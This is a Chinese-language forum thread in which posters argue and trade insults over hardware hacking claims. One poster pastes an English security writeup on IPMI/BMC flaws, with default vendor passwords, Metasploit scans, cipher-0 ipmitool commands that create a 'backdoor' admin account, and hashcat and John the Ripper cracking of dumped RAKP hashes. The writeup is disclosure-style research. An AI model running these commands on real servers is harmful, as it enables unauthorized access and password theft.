: 你个文科五毛,看的懂爷我的技术假设吗?看不懂就别丢脸了。
w********2
发帖数: 632
56
想当初ipmi被当作网络管理员的救星,不到10年,成了谁都不要的狗屎。
w********2
发帖数: 632
57
爷我用norton utilities查dos病毒hex特征字符串用汇编语言消毒的时候,你还在娘胎
里。

【在 c****3 的大作中提到】
: 你这种生物文科就不要现眼计算机了
w********2
发帖数: 632
58
Anthony Bonkoski, Russ Bielawski and J. Alex Halderman of the University of
Michigan presented the findings of research on a common IPMI implementation
from the server OEM Supermicro. They found that the IPMI firmware, developed
by ATEN Technologies, contained "numerous, textbook security flaws" that
included buffer overflow vulnerabilities, privilege escalation
vulnerabilities and shell injection. They then demonstrated an attack
leveraging one of those: a buffer overflow in a web interface used to
access the IPMI feature to remotely obtain a root shell on the BMC.
w********2
发帖数: 632
59
用一个小芯片做定时电动jumper,把ipmi 或bios或me flash掉,很多底层漏洞都出来
了,再配合远程网络攻击,应该是可以的。彭博提到这个小芯片像jumper,可能就是这
个作用。
t******x
发帖数: 55
60
别自己顶了,看着和文科生一样,计算机行业安全怎么做的,别人都说清楚了,还在顶
相关主题
加油!WSN们也会有春天-谈谈我的美国老婆这次台湾大巴失火烧死陆客,真有可能是恐怖袭击
说到枪的事,想起半年前的break inBloomberg 震撼报告: the big hack
看到本版言论我想到一个笑话救富士康的工人就是救我们自己的下一代,9·11”后美国男婴出生率一度下降
进入Military版参与讨论
w********2
发帖数: 632
61
你懂个屁,还在这儿和爷我顶。这板上很多马公的硬件软件水平不如我老。

【在 t******x 的大作中提到】
: 别自己顶了,看着和文科生一样,计算机行业安全怎么做的,别人都说清楚了,还在顶
t******x
发帖数: 55
62
你这种就是外行的文科,马公一看就知道,叫了半天,什么干活都没有
你能写出程序hack进去,才算是真的,这才是干活
这种程序都不会写吧?

【在 w********2 的大作中提到】
: 你懂个屁,还在这儿和爷我顶。这板上很多马公的硬件软件水平不如我老。
k**0
发帖数: 19737
63
没错,太傻逼了, 老将本来就弱智, 还硬要装逼技术大牛, 笑死人

【在 s*********2 的大作中提到】
: 老将可能懂吗,老将只要能反华就行了,一边骂着土鳖芯片技术落后,一边又说土鳖能
: hack情报,但又为了证明这不是啥高级货想法设法曲解。

w********2
发帖数: 632
64
你哪知道爷我发过写程序的文章,你这种文科五毛,哪知道生物研究中还有像爷这种主
要做计算机的人物。呵呵。

【在 t******x 的大作中提到】
: 你这种就是外行的文科,马公一看就知道,叫了半天,什么干活都没有
: 你能写出程序hack进去,才算是真的,这才是干活
: 这种程序都不会写吧?

w********2
发帖数: 632
65
这贴成为文科五毛暴露贴,尼玛平时道貌岸然的一些id背后竟然都是文科五毛。奶奶的。

【在 k**0 的大作中提到】
: 没错,太傻逼了, 老将本来就弱智, 还硬要装逼技术大牛, 笑死人
t******x
发帖数: 55
66
你们这种灌水千老,本性难改,到哪里就只会灌水
我们马公,没人care这种擦屁股纸文章,想hack,就自己写程序,找漏洞,证明自己能
hack进去,确实有漏洞
计算机里面,文章就是擦屁股纸,不会自己动手,到处被歧视

【在 w********2 的大作中提到】
: 你哪知道爷我发过写程序的文章,你这种文科五毛,哪知道生物研究中还有像爷这种主
: 要做计算机的人物。呵呵。

w********2
发帖数: 632
67
你要真懂计算机,就应该知道我老骂你们文科五毛这句话的分量了。
“爷我用norton utilities查dos病毒hex特征字符串用汇编语言消毒的时候,你还在娘胎
里。”

【在 t******x 的大作中提到】
: 你们这种灌水千老,本性难改,到哪里就只会灌水
: 我们马公,没人care这种擦屁股纸文章,想hack,就自己写程序,找漏洞,证明自己能
: hack进去,确实有漏洞
: 计算机里面,文章就是擦屁股纸,不会自己动手,到处被歧视

w********2
发帖数: 632
68
另外,没想到你是文科五毛,嘿嘿。平时积攒的credit到现在耗完了。哈哈。

【在 t******x 的大作中提到】
: 你们这种灌水千老,本性难改,到哪里就只会灌水
: 我们马公,没人care这种擦屁股纸文章,想hack,就自己写程序,找漏洞,证明自己能
: hack进去,确实有漏洞
: 计算机里面,文章就是擦屁股纸,不会自己动手,到处被歧视

w********2
发帖数: 632
69
Baseboard Management Controllers (BMCs) are a type of embedded computer used
to provide out-of-band monitoring for desktops and servers. These products
are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM,
Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as
embedded ARM systems, running Linux and connected directly to the
southbridge of the host system's motherboard. Network access is obtained
either via 'sideband' access to an existing network card or through a
dedicated interface. In addition to being built-in to various motherboards,
BMCs are also sold as pluggable modules and PCI cards. Nearly all servers
and workstations ship with or support some form of BMC. The Intelligent
Platform Management Interface (IPMI) is a collection of specifications that
define communication protocols for talking both across a local bus as well
as the network. This specification is managed by Intel and currently comes
in two flavors, version 1.5 and version 2.0. The primary goal of Dan Farmer'
s research was on the security of the IPMI network protocol that uses UDP
port 623. A diagram of the how the BMC interfaces with the system is shown
below (CC-SA-3.0 (C) U. Vezzani).
w********2
发帖数: 632
70
The network services offered by major brands of BMCs different widely by
vendor, but here are some commonalities. Most BMCs expose some form of web-
based management, a command-line interface such as Telnet or Secure Shell,
and the IPMI network protocol on port 623 (UDP and sometimes TCP). The
example below shows the output of Nmap -sSV -p1-65535 scan against a
Supermicro BMC in its default configuration.
Supermicro IPMI (firmware SMT_X9_218)
PORT STATE SERVICE VERSION
22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0)
80/tcp open http lighttpd
443/tcp open ssl/http lighttpd
623/tcp open ipmi-rmcp SuperMicro IPMI RMCP
5900/tcp open vnc VNC (protocol 3.8)
5985/tcp open wsman?
49152/tcp open upnp Intel UPnP reference SDK 1.3.1 (Linux 2.6.17.WB_
WPCM450.1.3; UPnP 1.0)
In addition to the TCP ports listed, this device also responds on UDP ports
623 (IPMI) and 1900 (UPnP SSDP).
相关主题
救富士康的工人就是救我们自己的下一代,9·11”后美国男婴出生率一度下降李莉你有美国移民局来的信 (转载)
这个video很有意思,休斯敦BMC的Bad Project (转载)这王利民是混的最惨的高考状元吗? (转载)
传销公司聘请5名权威法学专家论证:这不是传销BioMed Central 召回 41 篇 文章-全部来自中国 (转贴)
进入Military版参与讨论
w********2
发帖数: 632
71
Network Discovery
A single-packet probe to the UDP IPMI service on port 623 is is an
especially fast way of discovering BMCs on the network. The following
examples demonstrates the use of the Metasploit Framework's ipmi_version
module to identify local BMCs. The reply indicates whether the device
supports version 1.5 or 2.0 and what forms of authentication are supported.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[*] 10.0.0.7:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null
_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.4:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null
_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.135:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(
password, md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.249:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(
password, md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.252:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(
password, md5, md2, null) Level(1.5, 2.0)
w********2
发帖数: 632
72
Usernames & Passwords
As most penetration testers know, the easiest way into most network devices
is through default passwords. BMCs are no different, and the table below
shows the default username and password combinations for the most popular
BMC brands sold today. Note that only HP randomizes the password during the
manufacturing process.
Product Name Default Username Default Password
HP Integrated Lights Out (iLO) Administrator character string>
Dell Remote Access Card (iDRAC, DRAC) root calvin
IBM Integrated Management Module (IMM) USERID PASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controller admin admin
Supermicro IPMI (2.0) ADMIN ADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM) root changeme
ASUS iKVM BMC admin admin
w********2
发帖数: 632
73
IPMI Authentication Bypass via Cipher 0
Dan Farmer identified a serious failing of the IPMI 2.0 specification,
namely that cipher type 0, an indicator that the client wants to use clear-
text authentication, actually allows access with any password. Cipher 0
issues were identified in HP, Dell, and Supermicro BMCs, with the issue
likely encompassing all IPMI 2.0 implementations. It is easy to identify
systems that have cipher 0 enabled using the ipmi_cipher_zero module in the
Metasploit Framework.
$ **msfconsole**

=[ metasploit v4.7.0-dev [core:4.7 api:1.0]=
=-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> **use auxiliary/scanner/ipmi/ipmi_cipher_zero**
msf auxiliary(ipmi_cipher_zero) > **set RHOSTS 10.0.0.0/24**
msf auxiliary(ipmi_cipher_zero) > **run**
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[ ] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher
zero
[ ] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher
zero
[ ] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher
zero
[ ] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher
zero
The following example demonstrates how to exploit the cipher 0 issue using
the standard "ipmitool" command-line interface. This utility is available on
most platforms and be installed on Debian-based Linux distributions by
running "sudo apt-get install ipmitool". Notice how the flag for specifying
cipher 0 (-C 0) allows a previously disallowed action to execute. For this
attack to work a valid username must be identified, which is almost never an
issue. Once a backdoor account has been created, any number of attacks on
the BMC and its host become possible.
$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user
list
Error: Unable to establish IPMI v2 / RMCP session
Get User Access command failed (channel 14, user 1)
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 (Empty User) true false false NO ACCESS
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user set name 2 backdoor
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user enable 2
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit
user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 backdoor true false true ADMINISTRATOR
$ ssh [email protected]
[email protected]'s password: password
User:backdoor logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at Nov 08 2012
Server Name: host is unnamed
Server Power: On
hpiLO->
w********2
发帖数: 632
74
IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
More recently, Dan Farmer identified an even bigger issue with the IPMI 2.0
specification. In short, the authentication process for IPMI 2.0 mandates
that the server send a salted SHA1 or MD5 hash of the requested user's
password to the client, prior to the client authenticating. You heard that
right - the BMC will tell you the password hash for any valid user account
you request. This password hash can broken using an offline bruteforce or
dictionary attack. Since this issue is a key part of the IPMI specification,
there is no easy path to fix the problem, short of isolating all BMCs into
a separate network. The ipmi_dumphashes module in the Metasploit Framework
can make short work of most BMCs.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_dumphashes) > **set THREADS 256
**
msf auxiliary(ipmi_dumphashes) > run
[ ] 10.0.0.59 root:266ead5921000000....
000000000000000000000000000000001404726f6f74:eaf2bd6a5
3ee18e3b2dfa36cc368ef3a4af18e8b
[ ] 10.0.0.59 Hash for user 'root' matches password 'calvin'
[ ] 10.0.0.59 :408ee18714000000d9cc....000000000000000000000000000000001400:
93503c1b7af26abee 34904f54f26e64d580c050e
[ ] 10.0.0.59 Hash for user '' matches password 'admin'
In the example above, the module was able to identify two valid user
accounts (root and blank), retrieve the hmac-sha1 password hashes for these
accounts, and automatically crack them using an internal wordlist. If a
database is connected, Metasploit will automatically store the hashed and
clear-text version of these credentials for future use. If a user's password
is not found in the local dictionary of common passwords, an external
password cracking program can be employed to quickly brute force possible
options. The example below demonstrates how to write out John the Ripper and
Hashcat compatible files.
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.1.0/24
msf auxiliary(ipmi_dumphashes) > **set THREADS 256
**
msf auxiliary(ipmi_dumphashes) > set OUTPUT_JOHN_FILE out.john
msf auxiliary(ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE out.hashcat
msf auxiliary(ipmi_dumphashes) > run
[ ] 10.0.1.100 root:ee33c2e02700000....
000000000000000000000000000000001404726f6f74:8c576f6532
356cc342591204f41cc4eab7da6e8a
Thanks to atom, the main developer of Hashcat, version 0.46 or above now
supports cracking RAKP hashes. It is worth noting that atom added support
for RAKP within 2 hours of receiving the feature request! In the example
below, we use hashcat with RAKP mode (7300) to brute force all four-
character passwords within a few seconds.
./hashcat-cli64.bin --username -m 7300 out.hashcat -a 3 ?a?a?a?a
Initializing hashcat v0.46 by atom with 8 threads and 32mb segment-size...
Added hashes from file out.hashcat: 1 (1 salts)
[ ... ]
Input.Mode: Mask (?a?a?a)
Index.....: 0/1 (segment), 857375 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 857375/857375 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
ee33c2e0270000....000000000000000000000000000000001404726f6f74:
8c576f6532356cc34 2591204f41cc4eab7da6e8a:taco
All hashes have been recovered
Thanks to Dhiru Kholia, John the Ripper's "bleeding-jumbo" branch now
supports cracking RAKP hashes as well. Make sure you have git installed and
build John with the following steps.
$ git clone https://github.com/magnumripper/JohnTheRipper.git
$ cd JohnTheRipper
$ git checkout bleeding-jumbo
$ cd src
$ make linux-x86-64
$ cd ../run
$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john
Loaded 1 password hash (RAKP [IPMI 2.0 RAKP (RMCP ) HMAC-SHA1 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
taco (10.0.1.100 root)
1 (共1页)
进入Military版参与讨论
相关主题
加油!WSN们也会有春天-谈谈我的美国老婆李莉你有美国移民局来的信 (转载)
说到枪的事,想起半年前的break in这王利民是混的最惨的高考状元吗? (转载)
看到本版言论我想到一个笑话BioMed Central 召回 41 篇 文章-全部来自中国 (转贴)
这次台湾大巴失火烧死陆客,真有可能是恐怖袭击德10家学术周刊撤回多篇中国论文 评议报告造假
Bloomberg 震撼报告: the big hack德國一大型出版集團宣布撤回64篇由中國學者撰寫的學術論文
救富士康的工人就是救我们自己的下一代,9·11”后美国男婴出生率一度下降英国汽车沉浮:中国买罗孚 印度买路虎
这个video很有意思,休斯敦BMC的Bad Project (转载)轉:[揭秘 Google Titan M 晶片: Pixel 3 的終極保鏢是如何煉成的?]
传销公司聘请5名权威法学专家论证:这不是传销Breast cancer 'linked to bra size'
相关话题的讨论汇总
话题: ipmi话题: bmc话题: user话题: password话题: bmcs